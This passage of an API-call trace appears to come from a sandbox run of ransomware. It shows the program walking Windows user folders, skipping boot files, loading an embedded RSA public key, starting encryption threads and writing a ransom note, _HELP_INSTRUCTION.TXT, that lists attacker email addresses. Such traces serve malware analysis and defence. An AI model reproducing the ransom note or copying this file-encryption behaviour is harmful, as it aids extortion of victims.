(lpString1="Templates", lpString2="..") returned 1 [0207.545] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0207.545] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0207.545] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0207.545] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates" [0207.545] SetErrorMode (uMode=0x1) returned 0x1 [0207.545] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates" [0207.545] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\" [0207.545] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Templates\\" | out: lpString1="C:\\Users\\Default\\Templates\\") returned="C:\\Users\\Default\\Templates\\" [0207.545] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Templates\\*.*") returned="C:\\Users\\Default\\Templates\\*.*" [0207.545] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0207.545] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0207.545] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Templates" | out: lpString1="C:\\Users\\Default\\Templates") returned="C:\\Users\\Default\\Templates" [0207.545] lstrcatW (in: lpString1="C:\\Users\\Default\\Templates", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Templates\\*.*") returned="C:\\Users\\Default\\Templates\\*.*" [0207.545] SetErrorMode (uMode=0x1) returned 0x1 [0207.545] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Templates\\_HELP_INSTRUCTION.TXT") returned 48 [0207.545] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0207.546] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0207.546] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xef4) returned 0x0 [0207.546] RegQueryValueExW (in: hKey=0xef4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43810f8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43810f8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0207.546] RegCloseKey (hKey=0xef4) returned 0x0 [0207.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0207.546] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0207.546] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\templates\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0207.546] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\templates\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.547] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0207.547] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0207.547] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.547] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0207.547] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0207.547] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0207.547] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0207.547] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0207.547] SetErrorMode (uMode=0x1) returned 0x1 [0207.547] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0207.547] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0207.547] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Videos\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0207.547] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Videos\\*.*") returned="C:\\Users\\Default\\Videos\\*.*" [0207.547] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0207.548] PathFindFileNameW (pszPath="C:\\Users\\Default\\Videos") returned="Videos" [0207.548] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0207.548] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0207.548] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0207.548] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0207.548] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0207.548] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0207.548] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Videos\\") returned 28 [0207.548] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Videos\\") [0207.548] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.548] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0207.548] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos\\") returned="\\\\?\\C:\\Users\\Default\\Videos\\" [0207.548] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xef8 [0207.549] Sleep (dwMilliseconds=0x96) [0207.704] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0207.704] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0207.704] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0207.704] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0207.704] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Videos\\*.*") returned="C:\\Users\\Default\\Videos\\*.*" [0207.704] SetErrorMode (uMode=0x1) returned 0x1 [0207.704] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Videos\\_HELP_INSTRUCTION.TXT") returned 45 [0207.704] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0207.705] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0207.705] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xefc) returned 0x0 [0207.705] RegQueryValueExW (in: hKey=0xefc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4381328, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4381328*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0207.705] RegCloseKey (hKey=0xefc) returned 0x0 [0207.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0207.705] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0207.705] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0207.705] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\videos\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.705] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0207.706] PathFindFileNameW (pszPath="C:\\Users\\Default\\Videos") returned="Videos" [0207.706] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0207.706] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0207.706] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0207.706] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0207.706] SetErrorMode (uMode=0x1) returned 0x1 [0207.706] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0207.706] lstrcatW (in: lpString1="C:\\Users\\Default User", lpString2="\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\" [0207.706] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default User\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\" [0207.706] lstrcatW (in: lpString1="C:\\Users\\Default User\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default User\\*.*") returned="C:\\Users\\Default User\\*.*" [0207.706] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0xffffffff [0207.706] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0207.706] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0207.706] lstrcatW (in: lpString1="C:\\Users\\Default User", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default User\\*.*") returned="C:\\Users\\Default User\\*.*" [0207.706] SetErrorMode (uMode=0x1) returned 0x1 [0207.707] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default User\\_HELP_INSTRUCTION.TXT") returned 43 [0207.707] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0207.707] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0207.707] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0xf00) returned 0x0 [0207.707] RegQueryValueExW (in: hKey=0xf00, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4381558, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x4381558*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0207.707] RegCloseKey (hKey=0xf00) returned 0x0 [0207.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0207.707] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0207.707] CreateFileW (lpFileName="C:\\Users\\Default User\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default user\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0207.707] CreateFileW (lpFileName="C:\\Users\\Default User\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default user\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.708] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0xffffffff [0207.708] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0207.708] FindNextFileW (in: hFindFile=0x43723b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 1 [0207.708] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0207.708] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0207.708] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0207.708] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0207.708] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0207.708] SetErrorMode (uMode=0x1) returned 0x1 [0207.708] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0207.708] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0207.708] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0207.708] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\*.*") returned="C:\\Users\\Public\\*.*" [0207.708] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x43723f8 [0207.708] PathFindFileNameW (pszPath="C:\\Users\\Public") returned="Public" [0207.708] lstrcpyW (in: lpString1=0x17d784, lpString2="Public" | out: lpString1="Public") returned="Public" [0207.708] StrStrW (lpFirst="9665D59245322DD390020D724953121B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0207.708] StrStrW (lpFirst="9665D59245322DD390020D724953121B.XZZX", lpSrch="ntldr") returned 0x0 [0207.708] StrStrW (lpFirst="9665D59245322DD390020D724953121B.XZZX", lpSrch="NTLDR") returned 0x0 [0207.708] StrStrW (lpFirst="9665D59245322DD390020D724953121B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0207.708] StrStrW (lpFirst="9665D59245322DD390020D724953121B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0207.708] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\") returned 20 [0207.708] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\") [0207.709] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0207.709] lstrcpyW (in: lpString1=0x17dfbc, lpString2="9665D59245322DD390020D724953121B.XZZX" | out: lpString1="9665D59245322DD390020D724953121B.XZZX") returned="9665D59245322DD390020D724953121B.XZZX" [0207.709] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Public\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\") returned="\\\\?\\C:\\Users\\Public\\" [0207.709] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf04 [0207.709] Sleep (dwMilliseconds=0x96) [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0207.860] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0207.860] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0207.860] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0207.860] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0207.860] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 1 [0207.860] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 0 [0207.860] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0207.860] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\*.*") returned="C:\\Users\\Public\\*.*" [0207.860] SetErrorMode (uMode=0x1) returned 0x1 [0207.860] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\_HELP_INSTRUCTION.TXT") returned 37 [0207.860] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0207.861] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0207.861] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0xf08) returned 0x0 [0207.861] RegQueryValueExW (in: hKey=0xf08, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4381788, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x4381788*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0207.861] RegCloseKey (hKey=0xf08) returned 0x0 [0207.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0207.861] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0207.861] CreateFileW 